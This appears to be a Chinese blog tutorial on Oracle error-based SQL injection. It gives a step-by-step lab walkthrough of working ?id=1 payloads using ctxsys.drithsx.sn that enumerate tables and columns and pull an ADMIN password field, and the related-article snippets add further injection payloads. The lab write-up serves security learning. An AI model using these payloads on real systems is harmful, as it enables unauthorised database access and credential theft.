Oracle注入——报错注入

已于 2022-07-14 11:19:50 修改
阅读量2.8k 收藏 6
点赞数 2
分类专栏: 常见web漏洞 文章标签: oracle 数据库
于 2022-02-19 13:12:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55854679/article/details/123011596
版权

Oracle数据库 SQL注入 报错注入 dual表 CTXSYS.DRITHSX.SN
关键词由CSDN通过智能技术生成

SQL注入之重新认识

文章目录

Oracle数据库

一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。

dual表

  • Dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,那么要它有什么用呢?
  • 它实际上是为了满足查询语句的结构而产生,你想查询你的用户名 select user from Dual ,调用系统函数:(获得随机值:select dbms_random.random from dual),还能做加减法:select 9+1 from dual
    在这里插入图片描述

数据库语句

  1. select * from all_tables 查询出所有的表
    select * from user_tables 查询出当前用户的表

  2. select*from all_tab_columns 查询出所有的字段
    select*from user_tab_columns 查询出当前用户的字段

  3. select*from v$version 查版本

  4. limitmysql数据库特有的,mssql、access数据库利用top实现分页的功能,oracle数据库利用rownum实现分页。

  5. rownum=1 (限制查询返回的总行数为一条)
    对于rownum来说,它是oracle系统顺序分配为从查询返回的行的编号,返回的第一行分配的是1,第二行是2,依此类推,这个伪字段可以用于限制查询返回的总行数。我们可以用rownum < 3来要求他输出2条数据,不能使用rownum=2,因为它是根据结果进行浮动的。

  6. 取结果第二行的方法【实现limit的功能】:

  • 不等于法 rownum=1 and column_name<>'UNAME'
    在这里插入图片描述
    在这里插入图片描述
  • 重命名法【别名只能用于字段名,不能表名】
select *from 
(select column_name,rownum n from user_tab_columns where table_name='ADMIN')
where n=2      //其中n为别名

在这里插入图片描述
在这里插入图片描述

报错注入函数解析

CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))

查询关于主题的对应关键词,然后因为查询失败(应该是这个用户没有创建和查询的权限,默认情况没有创建,爆出未查询到的错误从而爆出查询的内容)

and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))     //查询数据库版本

为什么需要1=?
因为Oracle的语言严谨,where后面跟的都是条件,单独的字符串不能作为条件,比较才能作为条件,存在的字段名等于这个字符串也可以作为条件。
在这里插入图片描述
在这里插入图片描述

练习

  1. ?id=1 and 1=2回显错误,说明存在sql注入。
  2. 使用?id=1 order by 4猜测字段数为4。
  3. ?id=1 union all select null,null,null,null from dual回显正常。
  4. ?id=1 union all select 1,null,null,null from dual查看1无回显,说明此处不是回显点。
  5. /?id=1 union all select 1,null,null,4 from dual回显出时间戳,说明为4回显点。
  6. 到这,我们可以有四种思路:盲注、报错注入、转化类型、通过甘薯对字符串的处理转化为数字在第四个注入点回显【切割字符串,转数字然后看回显】。
  7. 我们主要尝试报错注入。
  8. 使用?id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))获得第一条数据。
  9. ?id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN'))获得第二条数据。

    10.?id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN' and table_name<>'NEWS'))获得第三条数据。
  10. ?id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from(select column_name,rownum n from user_tab_columns where table_name='ADMIN') where n=1))获得ADMIN表中的第一个列名UNAME。
  11. ?id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from(select column_name,rownum n from user_tab_columns where table_name='ADMIN') where n=2))获得ADMIN表中的第二个列名UASS。
  12. ?id=1 and 1=ctxsys.drithsx.sn(1,(select UPASS from (select UPASS,rownum n from ADMIN)where n=2))获得正确的flag。
poggioxay
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【漏洞挖掘】——113、multipoint报错注入深入刨析
Fly_鹏程万里
06-21 63
其余的依次变量limit x,y中的x的值来获取表名信息即可~其余的依次变量limit x,y中的x的值来获取表名信息即可~这里以Less-05为例做演示~
【漏洞挖掘】——116、GeometryCollection报错注入
Fly_鹏程万里
06-25 69
本篇文章我们主要对报错注入的原理进行了介绍,同时对报错注入的几种常见方式、函数,手工注入语句进行了演示介绍~其余的依次变量limit x,y中的x的值来获取表名信息即可~其余的依次变量limit x,y中的x的值来获取表名信息即可~
Oracle数据库--报错注入
Y22Lee的博客
04-01 1046
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。dual 是Oracle库中特有的一个单行单列的虚拟表,Oracle中的一个实际存在的表,任何用户均可读取,常用在没有目标表的Select语句块中。Oracle中弱化了库的概念,用户被强化,即:通俗的讲一个用户一个库。利用子查询和别名,将数据的编号固定住,这样修改r的值即可取出对应的第几条数据。r=1取第一条数据,r=2取第二条数据。利用子查询和别名,将数据的编号固定住,这样修改r的值即可取出对应的第几条数据。
Oracle-报错注入
weixin_45634365的博客
03-05 523
一、Oracle数据库简介 Oracle数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品,是一种关系数据库数据库体量较大,一般与jsp网站联合。 常见的数据库:MySQL、MSSQL、Access、Oracle Oracle使用免费,但如果使用中的数据库遇到了问题,例如数据丢失、数据库打不开等等,想要解决问题,就必须寻找Oracle官方的服务,而服务价格不菲,而这就是Oracle的盈利方式。 Oracle比MySQL、MSSQL、Access更为先进,对大数据的处理能力
几种常见的报错注入类型详解
最新发布
m0_74312676的博客
07-23 737
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
Oracle -- 报错注入
qq_68233961的博客
08-21 934
Oracle -- 报错注入
oracle报错注入
笔墨稠思
11-25 2255
Oracle报错注入原理 通过ctxsys.drithsx.sn(user,查询语句)函数来根据页面报错获取我们需要的内容 注意事项: 1.oracle数据库在查询时,必须写表名,如果表不存在可以使用虚表 dual 2.Oracle数据库的字段数据类型是强匹配,必须保持数据类型相同 3.Oracle系统表 all_tables、user_tables、all_tab_columns、user_tab_columns 4.oracle限制查询结果返回的数量用rownum 靶场:http://59.63.2
Oracle注入--报错注入
weixin_52351575的博客
10-02 885
一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。
Oracle——显错注入报错注入
Mr.Huang_的博客
09-11 242
一、注入函数解析 数据库语言大同小异 oracle 甲骨文公司 使用免费的数据库 服务收费 http://59.63.200.79:8808/index_x.php 这个网址提供了,Oracle数据库接口,我们就可以直接用这个,而不用自己搭建了。 dual这个是一个虚表,是不存在的,是为了专门满足格式而存在的一个表。 Oracle 很死板 非常讲究语法格式 因为你Oracle不像mysql一样,后面不加表也行,他是必须加个表名满足格式,但是为了方便就提供了dual这个表。
Oracle报错注入靶场
weixin_45540609的博客
04-23 652
存在5个字段 union select null,null,null,null from dual union select 1,null,null,100 from dual union select 1,to_nchar('aaa'),to_nchar('bbb'),100 from dua l union select 1,to_nchar(table_name),to_nchar('bbb'),null from user_tables 表名admin ...
Oracle爆错手工注入.doc
04-05
手工注入方式,利用报错注入 Oracle
【漏洞挖掘】——111、polygon报错注入深入刨析
Fly_鹏程万里
06-21 75
其余的依次变量limit x,y中的x的值来获取表名信息即可~其余的依次变量limit x,y中的x的值来获取表名信息即可~这里以Less-05为例做演示。
oracle报错注入的一些函数
weixin_34090562的博客
02-19 608
oracle 报错注入 select dbms_xmltranslations.extractxliff((select banner from sys.v_$version where rownum=1)) from dual --爆数据库版本号 select dbms_xdb_version.checkin((select banner from sys.v_$version...
19、注入篇--报错注入Oracle
WX公众号-小白学安全
04-10 781
Oracle概述 1、Oracle数据库属于甲骨文公司,关系型数据库管理系统,数据库 2、讲究语法严谨 select 字段名 from 表名 3、dual表—>虚表 专门用于满足数据库语句结构的表 大部分数据库是数据敏感大小写,语句是不敏感大小写 4、Oracle系统自带表: 没有库的概念,只有用户的概念 查询出所有的表: select from all_tables 查询用户所创建的表:select from user_tables 查询所有的字段:select from all_tab_colum
【学习笔记】Oracle报错注入
chualam的博客
11-17 236
||utl_inaddr. get_host_name id=1||utl_inaddr. get_host_name((select banner from v$version where rownum=1)) 爆数据库版本 id=1||utl_inaddr. get_host_name((select owner from all_tables where rownum=1)) 爆库名 id=1||utl_inaddr. get_host_name((select owner from all_tabl
网络安全零基础入门(第六章-5)Oracle注入——报错注入
素笺
04-09 212
每日一句:没有学不会的东西,只有不努力的man 本篇内容:注入函数解析      报错注入+联合查询(union all)      实战注意 一、注入函数解析 1.提示:     Oracle注入比较麻烦,有点小难要有心理准备,原因是Oracle数据库本身比较复杂           2.报错注入原理     报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。          ...
数据库注入学习笔记4---Oracle注入(报错注入)
qq_41759633的博客
08-07 609
先看以下不同: Dual Oracle中的系统表 rownum=1 与limit相似 and table name<>‘ADMIN’ 暂时理解为排除某个表或者字段 使用 ?id=1’ 产生报错信息 使用 ctxsys.brithsx.sn() 进行报错注入 查询库名 查询表名 把admin排除查询第二个表,同样的把查询出来的NEWS排除得到第三个...
封神台Oracle注入- 报错注入
qq_40941912的博客
10-05 1043
一、原理 跟MySQL的注入一样,都是程序原本要执行的sql语句拼接了用户输入的语句,导致出现了不该出现的数据。不同的数据库使用的函数不同,Oracle使用的是ctxsys.drithsx.sn函数实现报错注入。 二、作业 Oracle注入- 报错注入 (Rank: 5) 在id=1 后添加and 1=1 发现页面可以正常显示,推断此处可能存在注入点 通过报错注入函数查询当前表名:and 1=ctxsys.drithsx.sn(1,(select table_name from user_tabl
oracle注入报错500
05-26
Oracle注入报错500一般表示服务器端出现了内部错误,可能与注入攻击有关,但也可能是其他原因导致的。要解决此问题,可以尝试以下步骤: 1. 检查注入语句是否正确,是否存在语法错误或拼写错误等问题。 2. 检查注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

poggioxay

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值